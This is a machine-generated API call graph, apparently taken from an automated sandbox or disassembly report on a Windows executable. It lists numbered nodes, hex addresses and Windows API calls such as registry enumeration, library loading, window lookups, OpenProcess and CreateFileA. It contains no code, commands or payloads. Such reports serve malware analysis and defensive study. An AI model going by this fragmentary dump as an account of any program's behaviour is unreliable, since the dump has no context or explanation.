API calls 63913->63915 63914->63900 63916->63897 63921->63788 63922->63792 63923->63792 63924->63884 63925->63884 63926->63884 63928 111746fb GetLocaleInfoW 63927->63928 63931 111746ab __setlocale_nolock 63927->63931 63929 11174717 63928->63929 63936 111746ea 63928->63936 63930 1117471d GetACP 63929->63930 63929->63936 63930->63902 63931->63928 63932 111746c1 __setlocale_nolock 63931->63932 63933 111746d2 GetLocaleInfoW 63932->63933 63934 111746ef 63932->63934 63933->63936 63947 11163c91 77 API calls __wcstoi64 63934->63947 63936->63902 63937->63896 63939 11174b5a _GetPrimaryLen 63938->63939 63940 11174b66 EnumSystemLocalesA 63939->63940 63941 11174b80 63940->63941 63941->63904 63942->63904 63943->63907 63944->63900 63947->63936 63951->63856 63952->63856 63953->63856 63954->63855 63956 111436a6 63955->63956 63958 11143763 63956->63958 63964 11081d30 63956->63964 63958->63649 63959 111436cb 63960 11081d30 IsDBCSLeadByte 63959->63960 63962 111436fb 63960->63962 63961 1114374d 63961->63649 63962->63961 63963 11143738 _memmove 63962->63963 63963->63961 63965 11081d3c 63964->63965 63967 11081d41 __mbschr_l std::locale::_Init 63964->63967 63968 11081c50 IsDBCSLeadByte 63965->63968 63967->63959 63968->63967 63972 11061970 63969->63972 63983 11061290 63972->63983 63974 110619ba 63991 11061320 63974->63991 63976 11061a08 64022 11061170 63976->64022 63980 110619cc 63980->63976 63982 11061320 286 API calls 63980->63982 63982->63980 63984 111101b0 std::locale::_Init 274 API calls 63983->63984 63985 110612ac 63984->63985 63986 110612b3 63985->63986 64026 1116305a std::exception::_Copy_str 63985->64026 63986->63974 63988 11061304 64027 111634b1 RaiseException 63988->64027 63990 11061319 63992 11061355 63991->63992 64020 11061624 std::ios_base::_Ios_base_dtor 63991->64020 63993 110614b4 63992->63993 63994 11061401 RegEnumValueA 63992->63994 63995 11061389 RegQueryInfoKeyA 63992->63995 64019 11061542 std::ios_base::_Ios_base_dtor 63993->64019 63993->64020 64028 110611e0 63993->64028 63999 1106149c 63994->63999 64008 11061435 63994->64008 63997 110613c2 63995->63997 63998 110613ae 63995->63998 64001 110613e2 63997->64001 64038 11029a70 274 API calls 2 library calls 63997->64038 64037 11029a70 274 API calls 2 library calls 63998->64037 64002 11163aa5 _free 65 API calls 63999->64002 64006 11163a11 _malloc 65 API calls 64001->64006 64005 110614a9 64002->64005 64003 11081d30 IsDBCSLeadByte 64003->64008 64005->63993 64011 110613f0 64006->64011 64007 1106146e RegEnumValueA 64007->63999 64007->64008 64008->64003 64008->64007 64008->64020 64039 11081e70 64008->64039 64010 110615a0 64010->64019 64050 11029a70 274 API calls 2 library calls 64010->64050 64011->63994 64013 11146a90 278 API calls 64013->64019 64017 11081d30 IsDBCSLeadByte 64017->64019 64019->64010 64019->64013 64019->64017 64019->64020 64021 11081e70 86 API calls 64019->64021 64020->63980 64021->64019 64023 110611a3 64022->64023 64024 110608e0 68 API calls 64023->64024 64026->63988 64027->63990 64029 110611ee 64028->64029 64030 11061208 64028->64030 64051 110608e0 64029->64051 64030->64019 64034 11145bc0 64030->64034 64095 111434c0 64034->64095 64040 11081e7d 64039->64040 64041 11081e82 64039->64041 64102 11081c50 IsDBCSLeadByte 64040->64102 64052 110608f4 64051->64052 64058 1106092c 64051->64058 64052->64058 64102->64041 64104->63674 64105->63675 64451->63715 64452->63720 64453 11116880 64471 11145ef0 64453->64471 64456 111168c5 64457 111168d4 CoInitialize CoCreateInstance 64456->64457 64458 111168a8 64456->64458 64460 11116904 LoadLibraryA 64457->64460 64461 111168f9 64457->64461 64462 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64458->64462 64459 11145c70 std::locale::_Init 91 API calls 64459->64456 64460->64461 64464 11116920 GetProcAddress 64460->64464 64465 111169e1 CoUninitialize 64461->64465 64466 111169e7 64461->64466 64463 111168b6 64462->64463 64467 11116930 SHGetSettings 64464->64467 64468 11116944 FreeLibrary 64464->64468 64465->64466 64469 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64466->64469 64467->64468 64468->64461 64470 111169f6 64469->64470 64472 11145c70 std::locale::_Init 91 API calls 64471->64472 64473 1111689e 64472->64473 64473->64456 64473->64458 64473->64459 64474 1102ebd0 64475 1102ec13 64474->64475 64476 111101b0 std::locale::_Init 274 API calls 64475->64476 64477 1102ec1a 64476->64477 64478 11143780 86 API calls 64477->64478 64479 1102ec64 64478->64479 64480 1102ec91 64479->64480 64481 11081e70 86 API calls 64479->64481 64483 11143780 86 API calls 64480->64483 64482 1102ec76 64481->64482 64485 11081e70 86 API calls 64482->64485 64484 1102ecba 64483->64484 64486 11163ca7 std::locale::_Init 77 API calls 64484->64486 64490 1102ecc7 64484->64490 64485->64480 64486->64490 64487 1102ecf6 64488 1102ed68 64487->64488 64489 1102ed4f GetSystemMetrics 64487->64489 64493 1102ed82 CreateEventA 64488->64493 64489->64488 64491 1102ed5e 64489->64491 64490->64487 64494 11145c70 std::locale::_Init 91 API calls 64490->64494 64492 11147060 std::locale::_Init 21 API calls 64491->64492 64492->64488 64495 1102ed95 64493->64495 64496 1102eda9 64493->64496 64494->64487 65540 11029a70 274 API calls 2 library calls 64495->65540 64498 111101b0 std::locale::_Init 274 API calls 64496->64498 64499 1102edb0 64498->64499 64500 1102edd0 64499->64500 65541 11110de0 64499->65541 64502 111101b0 std::locale::_Init 274 API calls 64500->64502 64503 1102ede4 64502->64503 64504 11110de0 437 API calls 64503->64504 64505 1102ee04 64503->64505 64504->64505 64506 111101b0 std::locale::_Init 274 API calls 64505->64506 64507 1102ee83 64506->64507 64508 1102eeb3 64507->64508 64509 11061aa0 314 API calls 64507->64509 64510 111101b0 std::locale::_Init 274 API calls 64508->64510 64509->64508 64511 1102eecd 64510->64511 64512 1102eef2 FindWindowA 64511->64512 64513 11061710 304 API calls 64511->64513 64515 1102f032 64512->64515 64516 1102ef2b 64512->64516 64513->64512 64517 11061ef0 278 API calls 64515->64517 64516->64515 64520 1102ef43 GetWindowThreadProcessId 64516->64520 64518 1102f044 64517->64518 64519 11061ef0 278 API calls 64518->64519 64521 1102f050 64519->64521 64522 11147060 std::locale::_Init 21 API calls 64520->64522 64524 11061ef0 278 API calls 64521->64524 64523 1102ef60 OpenProcess 64522->64523 64523->64515 64525 1102ef7d 64523->64525 64526 1102f05c 64524->64526 64530 11147060 std::locale::_Init 21 API calls 64525->64530 64527 1102f073 64526->64527 64528 1102f06a 64526->64528 64894 111464e0 64527->64894 65569 11028360 119 API calls 2 library calls 64528->65569 64533 1102efb0 64530->64533 64531 1102f06f 64531->64527 64535 1102efef CloseHandle FindWindowA 64533->64535 64538 11147060 std::locale::_Init 21 API calls 64533->64538 64534 1102f082 64536 1102f086 64534->64536 64909 1102a6d0 IsJPIK 64534->64909 64539 1102f022 64535->64539 64540 1102f014 GetWindowThreadProcessId 64535->64540 64925 11145990 ExpandEnvironmentStringsA 64536->64925 64542 1102efc2 SendMessageA WaitForSingleObject 64538->64542 64543 11147060 std::locale::_Init 21 API calls 64539->64543 64540->64539 64542->64535 64546 1102efe2 64542->64546 64544 1102f02f 64543->64544 64544->64515 64548 11147060 std::locale::_Init 21 API calls 64546->64548 64550 1102efec 64548->64550 64549 1102f0b5 64551 1102f177 64549->64551 64947 11063880 64549->64947 64550->64535 64962 11027b20 64551->64962 64558 1102f1bd 64559 1102f19c std::locale::_Init 64559->64558 64561 1102ad70 std::locale::_Init 144 API calls 64559->64561 64895 111457a0 std::locale::_Init 274 API calls 64894->64895 64896 111464fb wsprintfA 64895->64896 64897 111457a0 std::locale::_Init 274 API calls 64896->64897 64898 11146517 wsprintfA 64897->64898 64899 11143e00 std::locale::_Init 8 API calls 64898->64899 64900 11146534 64899->64900 64901 11146560 64900->64901 64902 11143e00 std::locale::_Init 8 API calls 64900->64902 64903 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64901->64903 64904 11146549 64902->64904 64905 1114656c 64903->64905 64904->64901 64906 11146550 64904->64906 64905->64534 64907 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64906->64907 64908 1114655c 64907->64908 64908->64534 64910 1102a705 64909->64910 64917 1102a7d3 64909->64917 64911 111101b0 std::locale::_Init 274 API calls 64910->64911 64912 1102a70c 64911->64912 64913 1102a73b 64912->64913 64914 11061aa0 314 API calls 64912->64914 64915 11063880 348 API calls 64913->64915 64914->64913 64916 1102a759 64915->64916 64916->64917 64918 110d1930 278 API calls 64916->64918 64917->64536 64920 1102a765 64918->64920 64919 1102a7c7 64921 110d0a10 274 API calls 64919->64921 64920->64919 64922 1102a798 64920->64922 64921->64917 64923 110d0a10 274 API calls 64922->64923 64924 1102a7a4 64923->64924 64924->64536 64926 111459c7 64925->64926 64927 111459e4 std::locale::_Init 64926->64927 64928 111459fe 64926->64928 64935 111459d4 64926->64935 64930 111459f5 GetModuleFileNameA 64927->64930 64929 111457a0 std::locale::_Init 274 API calls 64928->64929 64931 11145a04 64929->64931 64930->64931 64933 11081e00 std::locale::_Init IsDBCSLeadByte 64931->64933 64932 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64934 1102f0a3 64932->64934 64933->64935 64936 11143e00 64934->64936 64935->64932 64937 11143e21 CreateFileA 64936->64937 64939 11143ebe CloseHandle 64937->64939 64940 11143e9e 64937->64940 64943 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64939->64943 64941 11143ea2 CreateFileA 64940->64941 64942 11143edb 64940->64942 64941->64939 64941->64942 64945 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64942->64945 64944 11143ed7 64943->64944 64944->64549 64946 11143eea 64945->64946 64946->64549 64948 1105e820 77 API calls 64947->64948 64949 110638a8 64948->64949 65630 110627b0 64949->65630 64963 11061a70 286 API calls 64962->64963 64964 11027b54 64963->64964 64965 1105e820 77 API calls 64964->64965 64967 11027b69 64965->64967 64966 11027bbf LoadIconA 64970 11027bd1 64966->64970 64971 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 64966->64971 64967->64966 64969 11145ef0 std::locale::_Init 91 API calls 64967->64969 64979 11027c38 64967->64979 64968 11027cec 64974 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 64968->64974 64975 11027ba2 LoadLibraryExA 64969->64975 64970->64971 64972 11027c13 64971->64972 64973 11027bff LoadIconA 64971->64973 64977 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 64972->64977 64972->64979 64973->64972 64978 11027cf9 64974->64978 64975->64966 64975->64973 64977->64979 64978->64559 64979->64968 64980 11081e70 86 API calls 64979->64980 64981 11145c70 std::locale::_Init 91 API calls 64979->64981 66257 11061e10 278 API calls 3 library calls 64979->66257 64980->64979 64981->64979 65542 111101b0 std::locale::_Init 274 API calls 65541->65542 65543 11110e11 65542->65543 65544 11110e33 GetCurrentThreadId InitializeCriticalSection 65543->65544 65546 111101b0 std::locale::_Init 274 API calls 65543->65546 65547 11110ea0 EnterCriticalSection 65544->65547 65548 11110e93 InitializeCriticalSection 65544->65548 65549 11110e2c 65546->65549 65550 11110f5a LeaveCriticalSection 65547->65550 65551 11110ece CreateEventA 65547->65551 65548->65547 65549->65544 67102 1116305a std::exception::_Copy_str 65549->67102 65550->64500 65552 11110ee1 65551->65552 65553 11110ef8 65551->65553 67104 11029a70 274 API calls 2 library calls 65552->67104 65556 111101b0 std::locale::_Init 274 API calls 65553->65556 65560 11110eff 65556->65560 65557 11110e4f 67103 111634b1 RaiseException 65557->67103 65561 11110f1c 65560->65561 65562 11110de0 431 API calls 65560->65562 65563 111101b0 std::locale::_Init 274 API calls 65561->65563 65562->65561 65564 11110f2c 65563->65564 65565 11110f3d 65564->65565 67105 11110280 InterlockedIncrement InterlockedIncrement CreateEventA 65564->67105 65567 11110040 431 API calls 65565->65567 65568 11110f55 65567->65568 65568->65550 65569->64531 65750 11145a70 65630->65750 65632 1106283c 65633 110d1930 278 API calls 65632->65633 65634 11062850 65633->65634 65635 11062864 std::ios_base::_Ios_base_dtor 65634->65635 65637 11062a37 65634->65637 65759 1116535d 65634->65759 65636 110637a8 65635->65636 65638 11164c77 std::locale::_Init 101 API calls 65635->65638 65639 1116535d _fgets 80 API calls 65637->65639 65638->65636 65758 11145a83 std::ios_base::_Ios_base_dtor 65750->65758 65751 11145990 276 API calls 65751->65758 65752 11164ead std::locale::_Init 142 API calls 65752->65758 65753 11145aea std::ios_base::_Ios_base_dtor 65753->65632 65754 11145aa5 GetLastError 65755 11145ab0 Sleep 65754->65755 65754->65758 65756 11164ead std::locale::_Init 142 API calls 65755->65756 65757 11145ac2 65756->65757 65757->65753 65757->65758 65758->65751 65758->65752 65758->65753 65758->65754 65760 11165369 __write 65759->65760 66257->64979 67102->65557 67103->65544 67105->65565 67107 110262f0 67108 110262fe GetProcAddress 67107->67108 67109 1102630f 67107->67109 67108->67109 67110 11026328 67109->67110 67111 1102631c K32GetProcessImageFileNameA 67109->67111 67113 1102632e GetProcAddress 67110->67113 67114 1102633f 67110->67114 67111->67110 67112 11026361 67111->67112 67113->67114 67115 11026346 67114->67115 67116 11026357 SetLastError 67114->67116 67116->67112 67117 1113d980 67118 1113d989 67117->67118 67119 1113d98e 67117->67119 67121 11139ed0 67118->67121 67122 11139f12 67121->67122 67123 11139f07 GetCurrentThreadId 67121->67123 67124 11139f20 67122->67124 67253 11029950 67122->67253 67123->67122 67260 11134830 67124->67260 67130 1113a011 67135 1113a042 FindWindowA 67130->67135 67141 1113a0da 67130->67141 67131 1113a59a 67133 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67131->67133 67136 1113a5b2 67133->67136 67134 11139f5c IsWindow IsWindowVisible 67137 11147060 std::locale::_Init 21 API calls 67134->67137 67138 1113a057 IsWindowVisible 67135->67138 67135->67141 67136->67119 67139 11139f87 67137->67139 67140 1113a05e 67138->67140 67138->67141 67143 1105e820 77 API calls 67139->67143 67140->67141 67148 11139a70 375 API calls 67140->67148 67144 1105e820 77 API calls 67141->67144 67154 1113a0ff 67141->67154 67142 1113a2b0 67147 1113a2ca 67142->67147 67151 11139a70 375 API calls 67142->67151 67146 11139fa3 IsWindowVisible 67143->67146 67164 1113a127 67144->67164 67145 1105e820 77 API calls 67149 1113a29f 67145->67149 67146->67130 67150 11139fb1 67146->67150 67153 1113a2e7 67147->67153 67496 1106c340 310 API calls 67147->67496 67152 1113a07f IsWindowVisible 67148->67152 67149->67142 67155 1113a2a4 67149->67155 67150->67130 67156 11139fb9 67150->67156 67151->67147 67152->67141 67157 1113a08e IsIconic 67152->67157 67497 1112ddd0 12 API calls 2 library calls 67153->67497 67154->67142 67154->67145 67495 1102d750 304 API calls std::locale::_Init 67155->67495 67162 11147060 std::locale::_Init 21 API calls 67156->67162 67157->67141 67163 1113a09f GetForegroundWindow 67157->67163 67160 1113a2ec 67165 1113a2f4 67160->67165 67166 1113a2fd 67160->67166 67168 11139fc3 GetForegroundWindow 67162->67168 67493 11132120 146 API calls 67163->67493 67164->67154 67170 11081d30 IsDBCSLeadByte 67164->67170 67179 1113a174 67164->67179 67498 11132a10 87 API calls 2 library calls 67165->67498 67173 1113a314 67166->67173 67174 1113a308 67166->67174 67167 1113a2ab 67167->67142 67175 11139fd2 EnableWindow 67168->67175 67176 11139ffe 67168->67176 67170->67179 67172 11143e00 std::locale::_Init 8 API calls 67181 1113a186 67172->67181 67500 111326b0 311 API calls std::locale::_Init 67173->67500 67182 1113a319 67174->67182 67499 11132780 311 API calls std::locale::_Init 67174->67499 67491 11132120 146 API calls 67175->67491 67176->67130 67185 1113a00a SetForegroundWindow 67176->67185 67177 1113a0ae 67494 11132120 146 API calls 67177->67494 67179->67172 67180 1113a2fa 67180->67166 67187 1113a193 GetLastError 67181->67187 67204 1113a1a1 67181->67204 67189 1113a312 67182->67189 67190 1113a429 67182->67190 67185->67130 67186 1113a0b5 67193 1113a0cb EnableWindow 67186->67193 67198 1113a0c4 SetForegroundWindow 67186->67198 67194 11147060 std::locale::_Init 21 API calls 67187->67194 67189->67182 67195 1113a331 67189->67195 67196 1113a3db 67189->67196 67192 11139600 320 API calls 67190->67192 67191 11139fe9 67492 11132120 146 API calls 67191->67492 67212 1113a42e 67192->67212 67193->67141 67194->67204 67195->67190 67202 111101b0 std::locale::_Init 274 API calls 67195->67202 67196->67190 67507 1103f920 69 API calls 67196->67507 67198->67193 67199 11139ff0 EnableWindow 67199->67176 67200 1113a455 67214 1105e820 77 API calls 67200->67214 67252 1113a57a std::ios_base::_Ios_base_dtor 67200->67252 67206 1113a352 67202->67206 67203 1113a3ea 67508 1103f960 69 API calls 67203->67508 67204->67154 67205 1113a1f2 67204->67205 67209 11081d30 IsDBCSLeadByte 67204->67209 67207 11143e00 std::locale::_Init 8 API calls 67205->67207 67210 1113a373 67206->67210 67501 11057eb0 319 API calls 67206->67501 67211 1113a204 67207->67211 67209->67205 67502 1110fff0 InterlockedIncrement 67210->67502 67211->67154 67216 1113a20b GetLastError 67211->67216 67212->67200 67407 11142d90 67212->67407 67213 1113a3f5 67509 1103f980 69 API calls 67213->67509 67226 1113a485 67214->67226 67219 11147060 std::locale::_Init 21 API calls 67216->67219 67219->67154 67221 1113a400 67510 1103f940 69 API calls 67221->67510 67222 1113a398 67503 1104d790 379 API calls 67222->67503 67225 1113a40b 67511 11110000 InterlockedDecrement 67225->67511 67227 1113a4cd 67226->67227 67230 1113a4aa 67226->67230 67231 1113a4d9 GetTickCount 67226->67231 67226->67252 67227->67231 67227->67252 67228 1113a3a3 67504 1104ed40 379 API calls 67228->67504 67233 11147060 std::locale::_Init 21 API calls 67230->67233 67234 1113a4eb 67231->67234 67231->67252 67232 1113a3d9 67232->67190 67235 1113a4b5 GetTickCount 67233->67235 67236 11143a50 144 API calls 67234->67236 67235->67252 67238 1113a4f7 67236->67238 67240 11147af0 278 API calls 67238->67240 67239 1113a3b9 67505 1104d7d0 379 API calls 67239->67505 67243 1113a502 67240->67243 67242 1113a3c4 67242->67190 67506 110ec320 296 API calls 67242->67506 67244 11143a50 144 API calls 67243->67244 67246 1113a515 67244->67246 67512 110261a0 LoadLibraryA 67246->67512 67248 1113a522 67248->67248 67513 1112d6e0 GetProcAddress SetLastError 67248->67513 67250 1113a569 67251 1113a573 FreeLibrary 67250->67251 67250->67252 67251->67252 67252->67131 67514 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 67253->67514 67255 1102995e 67256 11029973 67255->67256 67515 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 67255->67515 67516 11089fe0 278 API calls 2 library calls 67256->67516 67259 1102997e 67259->67124 67261 11134872 67260->67261 67262 11134b94 67260->67262 67264 1105e820 77 API calls 67261->67264 67263 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67262->67263 67265 11134bac 67263->67265 67266 11134892 67264->67266 67308 11134310 67265->67308 67266->67262 67267 1113489a GetLocalTime 67266->67267 67268 111348d1 LoadLibraryA 67267->67268 67269 111348b0 67267->67269 67517 11009940 LoadLibraryA 67268->67517 67270 11147060 std::locale::_Init 21 API calls 67269->67270 67272 111348c5 67270->67272 67272->67268 67273 11134925 67518 110161e0 LoadLibraryA 67273->67518 67275 11134930 GetCurrentProcess 67276 11134955 GetProcAddress 67275->67276 67277 1113496d GetProcessHandleCount 67275->67277 67276->67277 67278 11134976 SetLastError 67276->67278 67279 1113497e 67277->67279 67278->67279 67280 111349a2 67279->67280 67281 11134988 GetProcAddress 67279->67281 67283 111349b0 GetProcAddress 67280->67283 67284 111349ca 67280->67284 67281->67280 67282 111349d7 SetLastError 67281->67282 67282->67283 67283->67284 67285 111349e4 SetLastError 67283->67285 67286 111349ef GetProcAddress 67284->67286 67285->67286 67287 11134a01 K32GetProcessMemoryInfo 67286->67287 67288 11134a0f SetLastError 67286->67288 67289 11134a17 67287->67289 67288->67289 67290 11147060 std::locale::_Init 21 API calls 67289->67290 67294 11134a8d 67289->67294 67290->67294 67291 11134b6a 67292 11134b7a FreeLibrary 67291->67292 67293 11134b7d 67291->67293 67292->67293 67295 11134b87 FreeLibrary 67293->67295 67296 11134b8a 67293->67296 67294->67291 67298 1105e820 77 API calls 67294->67298 67295->67296 67296->67262 67297 11134b91 FreeLibrary 67296->67297 67297->67262 67299 11134ade 67298->67299 67300 1105e820 77 API calls 67299->67300 67301 11134b06 67300->67301 67302 1105e820 77 API calls 67301->67302 67303 11134b2d 67302->67303 67304 1105e820 77 API calls 67303->67304 67305 11134b54 67304->67305 67305->67291 67306 11134b65 67305->67306 67519 11027de0 274 API calls 2 library calls 67306->67519 67310 1113433d 67308->67310 67309 111347f9 67309->67130 67309->67131 67411 11139a70 67309->67411 67310->67309 67311 110d1930 278 API calls 67310->67311 67312 1113439e 67311->67312 67313 110d1930 278 API calls 67312->67313 67314 111343a9 67313->67314 67315 111343d7 67314->67315 67316 111343ee 67314->67316 67520 11029a70 274 API calls 2 library calls 67315->67520 67318 11147060 std::locale::_Init 21 API calls 67316->67318 67320 111343fc 67318->67320 67521 110d1530 274 API calls 67320->67521 67408 11142daf 67407->67408 67409 11142d9a 67407->67409 67408->67200 67522 11142400 67409->67522 67414 11139a8d 67411->67414 67469 11139eaf 67411->67469 67412 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67413 11139ebe 67412->67413 67413->67134 67415 11145c70 std::locale::_Init 91 API calls 67414->67415 67414->67469 67416 11139acc 67415->67416 67417 1105e820 77 API calls 67416->67417 67416->67469 67418 11139afb 67417->67418 67653 1112d860 67418->67653 67420 11139c40 PostMessageA 67421 11139c55 67420->67421 67424 11139c65 67421->67424 67660 11110000 InterlockedDecrement 67421->67660 67422 1105e820 77 API calls 67423 11139c3c 67422->67423 67423->67420 67423->67421 67426 11139c6b 67424->67426 67427 11139c8d 67424->67427 67429 11139cc3 std::ios_base::_Ios_base_dtor 67426->67429 67430 11139cde 67426->67430 67661 11131320 297 API calls std::locale::_Init 67427->67661 67437 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67429->67437 67432 11143a50 144 API calls 67430->67432 67431 11139c95 67662 11147ad0 96 API calls 67431->67662 67435 11139ce3 67432->67435 67434 11139b4b 67443 11146710 280 API calls 67434->67443 67445 11139beb 67434->67445 67438 11147af0 278 API calls 67435->67438 67436 11139c9f 67663 1112da60 SetDlgItemTextA 67436->67663 67441 11139cda 67437->67441 67442 11139cea SetWindowTextA 67438->67442 67440 11139cb0 std::ios_base::_Ios_base_dtor 67440->67426 67441->67134 67444 11139d06 67442->67444 67451 11139d0d std::ios_base::_Ios_base_dtor 67442->67451 67443->67445 67664 111361c0 305 API calls 4 library calls 67444->67664 67445->67420 67445->67422 67447 11139d64 67448 11139d78 67447->67448 67449 11139e3c 67447->67449 67452 11139d9c 67448->67452 67667 111361c0 305 API calls 4 library calls 67448->67667 67454 11139e5d 67449->67454 67458 11139e4b 67449->67458 67459 11139e44 67449->67459 67450 11139d37 67450->67447 67455 11139d4c 67450->67455 67451->67447 67451->67450 67665 111361c0 305 API calls 4 library calls 67451->67665 67669 110f8b70 86 API calls 67452->67669 67673 110f8b70 86 API calls 67454->67673 67666 11132120 146 API calls 67455->67666 67672 11132120 146 API calls 67458->67672 67671 111361c0 305 API calls 4 library calls 67459->67671 67462 11139e68 67462->67469 67470 11139e6c IsWindowVisible 67462->67470 67463 11139da7 67463->67469 67471 11139daf IsWindowVisible 67463->67471 67465 11139d5c 67465->67447 67467 11139e5a 67467->67454 67468 11139d86 67468->67452 67472 11139d92 67468->67472 67469->67412 67470->67469 67473 11139e7e IsWindowVisible 67470->67473 67471->67469 67474 11139dc6 67471->67474 67668 11132120 146 API calls 67472->67668 67473->67469 67476 11139e8b EnableWindow 67473->67476 67477 11145c70 std::locale::_Init 91 API calls 67474->67477 67674 11132120 146 API calls 67476->67674 67480 11139dd1 67477->67480 67478 11139d99 67478->67452 67480->67469 67482 11139ddc GetForegroundWindow IsWindowVisible 67480->67482 67481 11139ea2 EnableWindow 67481->67469 67483 11139e01 67482->67483 67484 11139df6 EnableWindow 67482->67484 67670 11132120 146 API calls 67483->67670 67484->67483 67486 11139e08 67487 11139e1e EnableWindow 67486->67487 67488 11139e17 SetForegroundWindow 67486->67488 67489 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67487->67489 67488->67487 67490 11139e38 67489->67490 67490->67134 67491->67191 67492->67199 67493->67177 67494->67186 67495->67167 67496->67153 67497->67160 67498->67180 67499->67189 67500->67182 67501->67210 67502->67222 67503->67228 67504->67239 67505->67242 67506->67232 67507->67203 67508->67213 67509->67221 67510->67225 67511->67232 67512->67248 67513->67250 67514->67255 67515->67255 67516->67259 67517->67273 67518->67275 67519->67291 67523 1114243f 67522->67523 67575 11142438 std::ios_base::_Ios_base_dtor 67522->67575 67524 111101b0 std::locale::_Init 274 API calls 67523->67524 67525 11142446 67524->67525 67527 11142476 67525->67527 67529 11061aa0 314 API calls 67525->67529 67526 11162bb7 __ehhandler$?_Init@?$numpunct@_W@std@@IAEXABV_Locinfo@2@@Z 5 API calls 67528 11142d8a 67526->67528 67530 11062220 112 API calls 67527->67530 67528->67408 67529->67527 67531 111424b2 67530->67531 67532 111424b9 RegCloseKey 67531->67532 67533 111424c0 std::locale::_Init 67531->67533 67532->67533 67534 111424cf 67533->67534 67535 1102a6d0 374 API calls 67533->67535 67536 11145990 276 API calls 67534->67536 67535->67534 67537 111424ec 67536->67537 67538 11143e00 std::locale::_Init 8 API calls 67537->67538 67539 11142500 67538->67539 67540 11142517 67539->67540 67541 11063880 348 API calls 67539->67541 67542 111101b0 std::locale::_Init 274 API calls 67540->67542 67541->67540 67543 1114251e 67542->67543 67544 1114253a 67543->67544 67545 11061710 304 API calls 67543->67545 67546 111101b0 std::locale::_Init 274 API calls 67544->67546 67545->67544 67547 11142553 67546->67547 67548 1114256f 67547->67548 67549 11061710 304 API calls 67547->67549 67550 111101b0 std::locale::_Init 274 API calls 67548->67550 67549->67548 67551 11142588 67550->67551 67552 111425a4 67551->67552 67553 11061710 304 API calls 67551->67553 67554 11061290 276 API calls 67552->67554 67553->67552 67555 111425cd 67554->67555 67556 11061290 276 API calls 67555->67556 67592 111425e7 67556->67592 67557 11142915 67559 110d1930 278 API calls 67557->67559 67561 11142cf9 67557->67561 67558 11061320 286 API calls 67558->67592 67560 11142933 67559->67560 67565 1105e820 77 API calls 67560->67565 67567 11061170 68 API calls 67561->67567 67562 11142905 67563 11147060 std::locale::_Init 21 API calls 67562->67563 67563->67557 67564 11147060 21 API calls std::locale::_Init 67564->67592 67566 11142970 67565->67566 67568 11142abd 67566->67568 67571 11061290 276 API calls 67566->67571 67569 11142d52 67567->67569 67570 11061a70 286 API calls 67568->67570 67572 11061170 68 API calls 67569->67572 67573 11142ad9 67570->67573 67574 1114298e 67571->67574 67572->67575 67648 110684e0 310 API calls std::locale::_Init 67573->67648 67576 11061320 286 API calls 67574->67576 67575->67526 67583 1114299d 67576->67583 67577 11132900 86 API calls 67577->67592 67578 111429d2 67581 11061290 276 API calls 67578->67581 67580 11147060 std::locale::_Init 21 API calls 67580->67583 67584 111429e8 67581->67584 67582 11142b03 67585 11142b33 EnterCriticalSection 67582->67585 67594 11142b07 67582->67594 67583->67578 67583->67580 67587 11061320 286 API calls 67583->67587 67588 11061320 286 API calls 67584->67588 67586 11142b50 67585->67586 67591 11061a70 286 API calls 67586->67591 67587->67583 67606 111429f8 67588->67606 67590 11081e70 86 API calls 67590->67592 67596 11142b66 67591->67596 67592->67557 67592->67558 67592->67562 67592->67564 67592->67577 67592->67590 67599 11081f20 86 API calls std::locale::_Init 67592->67599 67593 11142a31 67594->67585 67649 11051360 364 API calls 4 library calls 67594->67649 67650 110684e0 310 API calls std::locale::_Init 67594->67650 67598 11142b7a LeaveCriticalSection 67596->67598 67603 1102b140 290 API calls 67596->67603 67599->67592 67600 11147060 std::locale::_Init 21 API calls 67600->67606 67606->67593 67606->67600 67609 11061320 286 API calls 67606->67609 67609->67606 67648->67582 67649->67594 67650->67594 67654 1112d87c 67653->67654 67655 1112d8b7 67654->67655 67656 1112d8a4 67654->67656 67675 1106c340 310 API calls 67655->67675 67658 11147af0 278 API calls 67656->67658 67659 1112d8af 67658->67659 67659->67434 67660->67424 67661->67431 67662->67436 67663->67440 67664->67451 67665->67450 67666->67465 67667->67468 67668->67478 67669->67463 67670->67486 67671->67458 67672->67467 67673->67462 67674->67481 67675->67659 67676 11135c20 67677 11135c29 67676->67677 67683 11135c58 67676->67683 67678 11145ef0 std::locale::_Init 91 API calls 67677->67678 67679 11135c2e 67678->67679 67680 11133b00 283 API calls 67679->67680 67679->67683 67681 11135c37 67680->67681 67682 1105e820 77 API calls 67681->67682 67681->67683 67682->67683 67684 1115cca0 67685 1115ccb4 67684->67685 67686 1115ccac 67684->67686 67696 1116406b 67685->67696 67689 1115ccd4 67690 1115ce00 67692 11163aa5 _free 65 API calls 67690->67692 67693 1115ce28 67692->67693 67694 1115ccf1 67694->67690 67695 1115cde4 SetLastError 67694->67695 67695->67694 67697 11170fc4 _calloc 65 API calls 67696->67697 67698 11164085 67697->67698 67702 1115ccc8 67698->67702 67720 1116a1af 65 API calls __getptd_noexit 